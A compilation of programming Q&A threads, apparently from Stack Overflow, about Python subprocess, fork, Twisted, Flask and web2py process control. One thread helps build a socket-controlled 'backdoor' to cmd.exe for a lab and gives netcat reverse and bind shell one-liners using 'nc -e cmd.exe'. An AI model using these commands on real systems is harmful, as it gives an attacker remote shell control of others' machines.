My plan is to provide a script just as the title states. I've got an idea which I'll descibe below. If you think something sounds bad/stupid, I'd be grateful for any constructive comments, improvements, etc.
There are 2 services I want to start as daemons. One is required (a caching service), one is optional (http access to the caching service). I use argparse module to get --port to get caching service port and optional --http-port to get http access. I already have this and it works. Now I'd like to start the daemons. THe services are based on twisted, so they have to start the reactor loop. So far I would like to have two different processes: one for the service and second one for http access (though I know it might be done in a single async process).
Since starting twisted service is done via reactor loop (which is python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command line command to start the process). I can use os.fork to start daemons and touch service.pid and http.pid files, but I don't know how to access the child pid, since os.fork returns 0 for the child.
So the chld PID is what I'm missing. Moreover, if anything seems illogical or overcomplicated, please comment on that.
My current code looks like this:
#!/usr/bin/python
import argparse
import os
from twisted.internet import reactor
parser = argparse.ArgumentParser(description='Run PyCached server.')
parser.add_argument('port', metavar='port', type=int,
help='PyCached service port')
parser.add_argument('--http-port', metavar='http-port', type=int, default=None,
help='PyCached http access port')
args = parser.parse_args()
def dumpPid(name):
f = open(name + '.pid', 'w')
f.write(str(os.getpid()))
f.flush()
f.close()
def erasePid(name):
os.remove(name + '.pid')
def run(name, port, factory):
dumpPid(name)
print "Starting PyCached %s on port %d" % (name, port)
reactor.listenTCP(port, factory)
reactor.run()
erasePid(name)
print "Successfully stopped PyCached %s" % (name,)
# start service (required)
fork_pid = os.fork()
if fork_pid == 0:
from server.service import PyCachedFactory
run('service', args.port, PyCachedFactory())
else:
# start http access (optional)
if args.http_port:
fork_pid = os.fork()
if fork_pid == 0:
from server.http import PyCachedSite
addr = ('localhost', args.port)
run('http', args.http_port, PyCachedSite(addr))
else:
pass
I run it with:
./run.py 8001 # with main service only
or:
./run.py 8001 --http-port 8002 # with additional http
System shutdown is done via single shell script:
#!/bin/bash
function close {
f="$1.pid"
if [ -f "$f" ]
then
kill -s SIGTERM `cat "$f"`
fi
}
close http
close service
Since starting twisted service is done via reactor loop (which is python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command line command to start the process).
You should use twistd. If not, then you should write a Python script for launching the daemon. Then you should use the subprocess module (or reactor.spawnProcess) to launch the child process.
Using os.fork without immediately proceeding to one of the os.exec* functions is broken. A large amount of state is shared between the parent and child created by os.fork. You can't be sure that this sharing won't break something (and I can tell you it will break some things in Twisted).
Here are some links to discussions of fork-without-exec issues that might help you get more of an idea of what a troublesome area this is.
Twisted epoll reactor issues - https://twistedmatrix.com/pipermail/twisted-python/2013-October/027611.html
stdlib ssl security issues - https://mail.python.org/pipermail/python-dev/2013-October/129834.html
is twisted incompatible with multiprocessing events and queues?
multiprocessing memory usage and twisted/gevents
Related
I'm trying to write a python script that start a process and do some operations atferward.
The commands that I want to automate by script are circled as red in the picture.
The problem is that after performing first command, qemu environment will be run and the other commands should be executed on the qemu environment. So I want to know how can I do these commands by an script in python? Because as I know I can do the first command but I do not know how can I do those commands when I am going to qemu environment.
Could you help me how can I do this process?
First thing that came to mind was pexpect, a quick search on google turned up this blog post automatically-testing-vms-using-pexpect-and-qemu which seems to be pretty much along the lines of what you are doing:
import pexpect
image = "fedora-20.img"
user = "root"
password = "changeme"
# Define the qemu cmd to run
# The important bit is to redirect the serial to stdio
cmd = "qemu-kvm"
cmd += " -m 1024 -serial stdio -net user -net nic"
cmd += " -snapshot -hda %s" % image
cmd += " -watchdog-action poweroff"
# Spawn the qemu process and log to stdout
child = pexpect.spawn(cmd)
child.logfile = sys.stdout
# Now wait for the login
child.expect('(?i)login:')
# And login with the credentials from above
child.sendline(user)
child.expect('(?i)password:')
child.sendline(password)
child.expect('# ')
# Now shutdown the machine and end the process
if child.isalive():
child.sendline('init 0')
child.close()
if child.isalive():
print('Child did not exit gracefully.')
else:
print('Child exited gracefully.')
You could do it with subprocess.Popen also, checking the stdout for the (qemu) lines and writing to stdin. Something roughly like this:
from subprocess import Popen,PIPE
# pass initial command as list of individual args
p = Popen(["./tracecap/temu","-monitor",.....],stdout=PIPE, stdin=PIPE)
# store all the next arguments to pass
args = iter([arg1,arg2,arg3])
# iterate over stdout so we can check where we are
for line in iter(p.stdout.readline,""):
# if (qemu) is at the prompt, enter a command
if line.startswith("(qemu)"):
arg = next(args,"")
# if we have used all args break
if not arg:
break
# else we write the arg with a newline
p.stdin.write(arg+"\n")
print(line)# just use to see the output
Where args contains all the next commands.
Don't forget that Python has batteries included. Take a look of the Suprocess module in the standard lib. There a lot of pitfalls managing processes, and the module take care of them all.
You probably want to start a qemu process and send the next commands writing to its standard input (stdin). Subprocess module will allow you to do it. See that qemu has command line options to connect to stdi: -chardev stdio ,id=id
I have written a Python application, using Flask, that serves a simple website that I can use to start playback of streaming video on my Raspberry Pi (microcomputer). Essentially, the application allows be to use my phone or tablet as a remote control.
I tested the application on Mac OS, and it works fine. After deploying it to the Raspberry Pi (with the Raspbian variant of Debian installed), it serves the website just fine, and starting playback also works as expected. But, stopping the playback fails.
Relevant code is hosted here: https://github.com/lcvisser/mlbviewer-remote/blob/master/remote/mlbviewer-remote.py
The subprocess is started like this:
cmd = 'python2.7 mlbplay.py v=%s j=%s/%s/%s i=t1' % (team, mm, dd, yy)
player = subprocess.Popen(cmd, shell=True, bufsize=-1, cwd=sys.argv[1])
This works fine.
The subprocess is supposed to stop after this:
player.send_signal(signal.SIGINT)
player.communicate()
This does work on Mac OS, but it does not work on the Raspberry Pi: the application hangs until the subprocess (started as cmd) is finished by itself. It seems like SIGINT is not sent or not received by the subprocess.
Any ideas?
(I have posted this question also here: https://unix.stackexchange.com/questions/133946/application-becomes-non-responsive-to-requests-on-raspberry-pi as I don't know if this is an OS problem or if it a Python/Flask-related problem.)
UPDATE:
Trying to use player.communicate() as suggested by Jan Vlcinsky below (and after finally seeing the warning here) did not help.
I'm thinking about using the proposed solution by Jan Vlcinsky, but if Flask does not even receive the request, I don't think that would receive the issue.
UPDATE 2:
Yesterday night I was fortunate to have a situation in which I was able to exactly pinpoint the issue. Updated the question with relevant code.
I feel like the solution of Jan Vlcinsky will just move the problem to a different application, which will keep the Flask application responsive, but will let the new application hang.
UPDATE 3:
I edited the original part of the question to remove what I now know not to be relevant.
UPDATE 4: After the comments of #shavenwarthog, the following information might be very relevant:
On Mac, mlbplay.py starts something like this:
rmtpdump <some_options_and_url> | mplayer -
When sending SIGINT to mlbplay.py, it terminates the process group created by this piped command (if I understood correctly).
On the Raspberry Pi, I'm using omxplayer, but to avoid having to change the code of mlbplay.py (which is not mine), I made a script called mplayer, with the following content:
#!/bin/bash
MLBTV_PIPE=mlbpipe
if [ ! -p $MLBTV_PIPE ]
then
mkfifo $MLBTV_PIPE
fi
cat <&0 > $MLBTV_PIPE | omxplayer -o hdmi $MLBTV_PIPE
I'm now guessing that this last line starts a new process group, which is not terminated by the SIGINT signal and thus making my app hang. If so, I should somehow get the process group ID of this group to be able to terminate it properly. Can someone confirm this?
UPDATE 5: omxplayer does handle SIGINT:
https://github.com/popcornmix/omxplayer/blob/master/omxplayer.cpp#L131
UPDATE 6: It turns out that somehow my SIGINT transforms into a SIGTERM somewhere along the chain of commands. SIGTERM is not handled properly by omxplayer, which appears to be the problem why things keep hanging. I solved this by implementing a shell script that manages the signals and translates them to proper omxplayer commands (sort-of a lame version of what Jan suggested).
SOLUTION: The problem was in player.send_signal(). The signal was not properly handled along the chain of commands, which caused the parent app to hang. The solution is to implement wrappers for commands that don't handle the signals well.
In addition: used Popen(cmd.split()) rather than using shell=True. This works a lot better when sending signals!
The problem is marked in following snippet:
#app.route('/watch/<year>/<month>/<day>/<home>/<away>/')
def watch(year, month, day, home, away):
global session
global watching
global player
# Select video stream
fav = config.get('favorite')
if fav:
fav = fav[0] # TODO: handle multiple favorites
if fav in (home, away):
# Favorite team is playing
team = fav
else:
# Use stream of home team
team = home
else:
# Use stream of home team
team = home
# End session
session = None
# Start mlbplay
mm = '%02i' % int(month)
dd = '%02i' % int(day)
yy = str(year)[-2:]
cmd = 'python2.7 mlbplay.py v=%s j=%s/%s/%s' % (team, mm, dd, yy)
# problem is here ----->
player = subprocess.Popen(cmd, shell=True, cwd=sys.argv[1])
# < ------problem is here
# Render template
game = {}
game['away_code'] = away
game['away_name'] = TEAMCODES[away][1]
game['home_code'] = home
game['home_name'] = TEAMCODES[home][1]
watching = game
return flask.render_template('watching.html', game=game)
You are starting up new process for executing shell command, but do not wait until it completes. You seem to rely on a fact, that the command line process itself is single one, but your frontend is not taking care of it and can easily start another one.
Another problem could be, you do not call player.communicate() and your process could block if stdout or stderr get filled by some output.
Proposed solution - split process controller from web app
You are trying to create UI for controlling a player. For this purpose, it would be practical splitting your solution into frontend and backend. Backend would serve as player controller and would offer methods like
start
stop
nowPlaying
To integrate front and backend, multiple options are available, one of them being zerorpc as shown here: https://stackoverflow.com/a/23944303/346478
Advantage would be, you could very easily create other frontends (like command line one, even remote one).
One more piece of the puzzle: proc.terminate() vs send_signal.
The following code forks a 'player' (just a shell with sleep in this case), then prints its process information. It waits a moment, terminates the player, then verifies that the process is no more, it has ceased to be.
Thanks to #Jan Vlcinsky for adding the proc.communicate() to the code.
(I'm running Linux Mint LMDE, another Debian variation.)
source
# pylint: disable=E1101
import subprocess, time
def show_procs(pid):
print 'Process Details:'
subprocess.call(
'ps -fl {}'.format(pid),
shell=True,
)
cmd = '/bin/sleep 123'
player = subprocess.Popen(cmd, shell=True)
print '* player started, PID',player.pid
show_procs(player.pid)
time.sleep(3)
print '\n*killing player'
player.terminate()
player.communicate()
show_procs(player.pid)
output
* player started, PID 20393
Process Details:
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
0 S johnm 20393 20391 0 80 0 - 1110 wait 17:30 pts/4 0:00 /bin/sh -c /bin/sleep 123
*killing player
Process Details:
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab. this is for educational purpose. i have two machines. 1) is running ubuntu and i have the in server this code:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
command_from_user = raw_input("Give your command: ") #read command from the user
if command_from_user == 'quit': break
c.send(command_from_user) #sending the command to client
c.close() # Close the connection
have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
and the error is in the client file
Traceback (most recent call last): File "ex1client2.py", line 50, in proc.stdin.write('%s\n' % data) ValueError: I/O operation on closed file
basically i want to run serial commands from the server to the client and get the output back in the server. the first command is executed, the second command i get this error message.
The main problem which led me to this solution is with chanhing directory command. when i excecute cd "path" it doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this list, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
s.close()
for data in f:
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).
I have python code that takes a bunch of tasks and distributes them to either different threads or different nodes on a cluster. I always end up writing a main script driver.py, that takes two command line arguments: --run-all and --run-task. The first is just a wrapper that iterates through all tasks and then calls driver.py --run-task with each task passed as argument. Example:
== driver.py ==
# Determine the current script
DRIVER = os.path.abspath(__file__)
(opts, args) = parser.parse_args()
if opts.run_all is not None:
# Run all tasks
for task in opts.run_all.split(","):
# Call driver.py again with a specific task
cmd = "python %s --run-task %s" %(DRIVER, task)
# Execute on system
distribute_cmd(cmd)
elif opts.run_task is not None:
# Run on an individual task
# code here for processing a task...
The user would then call:
$ driver.py --run-all task1,task2,task3,task4
And each task would get distributed.
The function distribute_cmd takes a shell executable command and sends in a system-specific way to either a node or a thread. The reason driver.py has to find its own name and call itself is because distribute_cmd needs an executable shell command; it cannot take a function name for example.
This consideration led me to this design, of a driver script having two modes and having to call itself. This has two complications: (1) the script has to find out its own path via __file__ and (2) when making this into a Python package, it's unclear where driver.py should go. It's meant to be an executable scripts, but if I put it in setup.py's scripts=, then I will have to find out where the scripts live (see correct way to find scripts directory from setup.py in Python distutils?). This does not seem to be a good solution.
What's an alternative design to this? Keep in mind that the distribution of tasks has to result in an executable command that can be passed as a string to distribute_cmd. thanks.
are you looking for is a library that already does exactly what you need, e.g. Fabric or Celery.
if you were not using nodes, I would suggest using multiprocessing.
this is a slightly similar question to this one
To be able to execute remotely, you either need:
ssh access to the box, in that case you can use Fabric to send your commands.
a server, SocketServer, tcp server, or anything that will accept connections.
an agent, or client, that will wait for data, if you are using a agent, you may as well use a broker for your messages. Celery allows you to do some of the plumbing, one end puts messages on the queue while the other end gets message from the queue. If the message is a command to execute, then the agent can do an os.system() call, or call subprocess.Popen()
celery example:
import os
from celery import Celery
celery = Celery('tasks', broker='amqp://guest#localhost//')
#celery.task
def run_command(command):
return os.system(command)
You will then need a worker that binds on the queue and waits for tasks to execute. More info in the documentation.
fabric example:
the code:
from fabric.api import run
def exec_remotely(command):
run(command)
the invocation:
$ fab exec_remotely:command='ls -lh'
More info in the documentation.
batch system case:
To go back to the question...
distribute_cmd is something that would call bsub somescript.sh
you need to find file only because you are going to re-execute the same script with other parameters
because of the above, you might have a problem providing a correct distutils script.
Let's question this design.
Why do you need to use the same script?
Can your driver write scripts then call bsub?
Can you use temporary files?
Do all the nodes actually share a filesystem?
How do you know file is going to exist on the node?
example:
TASK_CODE = {
'TASK1': '''#!/usr/bin/env python
#... actual code for task1 goes here ...
''',
'TASK2': '''#!/usr/bin/env python
#... actual code for task2 goes here ...
'''}
# driver portion
(opts, args) = parser.parse_args()
if opts.run_all is not None:
for task in opts.run_all.split(","):
task_path = '/tmp/taskfile_%s' % task
with open(task_path, 'w') as task_file:
task_file.write(TASK_CODE[task])
# note: should probably do better error handling.
distribute_cmd(task_path)
I've got an Apache2/web2py server running using the wsgi handler functionality. Within one of the controllers, I am trying to run an external executable to perform some processing on 2 files.
My approach to this is to use the subprocess module to kick off the executable. I have simplified the code to a bare-bones implementation with little success.
from subprocess import *
p = Popen(("echo", "Hello"), shell=False)
ret = p.wait()
print "Process ended with status %s" % ret
When running the above code on its own (create new file and running via python command line), it works exactly as expected.
However, as soon as I place the exact same code into my web2py controller, the external process stops working. Instead of the process returning with code 0 as is expected in the above example, it always returns -6 and "Hello" is not printed to stdout.
After doing some digging, I found that negative results from p.wait() implies that a signal caused the process to end abnormally. And, according to some docs I found, -6 corresponds to the SIGABRT signal.
I would have expected this signal to be a result of some poorly executed code in my child process. However, since this is only running echo (and since it works outside of web2py) I have my doubts that the child process is signalling itself.
Is there some web2py limitation/configuration that causes Popen() requests to always fail? If so, how can I modify my logic so that the controller (or whatever) is actually able to spawn this external process?
** EDIT: Looks like web2py applications may not like the subprocess module. According to a reply to a message reply in the web2py email group:
"You should not use subprocess in a web2py application (if you really need too, look into the admin/controllers/shell.py) but you can use it in a web2py program running from shell (web2py.py -R myprogram.py)."
I will be checking out some options based on the note here and see if any solution presents itself.
In the end, the best I was able to come up with involved setting up a simple XML RPC server and call the functions from that:
my_server.py
#my_server.py
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from subprocess import *
proc_srvr = xmlrpclib.ServerProxy("http://localhost:12345")
def echo_fn():
p = Popen(("echo", "hello"), shell=False)
ret = p.wait()
print "Process ended with status %s" % ret
return True # RPC Server doesn't like to return None
def main():
server = SimpleXMLRPCServer(("localhost", 12345), ErrorHandler)
server.register_function(echo_fn, "echo_fn")
while True:
server.handle_request()
if __name__ == "__main__":
main()
web2py_controller.py
#web2py_controller.py
def run_echo():
proc_srvr = xmlrpclib.ServerProxy("http://localhost:12345")
proc_srvr.echo_fn()
I'll be honest, I'm not a Python nor SimpleRPCServer guru, so the overall code may not be up to best-practice standards. However, going this route did allow me to, in effect, call a subprocess from a controller in web2py.
(Note, this was a quick and dirty simplification of the code that I have in my project. I have not validated it is in a working state, so it may require some tweaks.)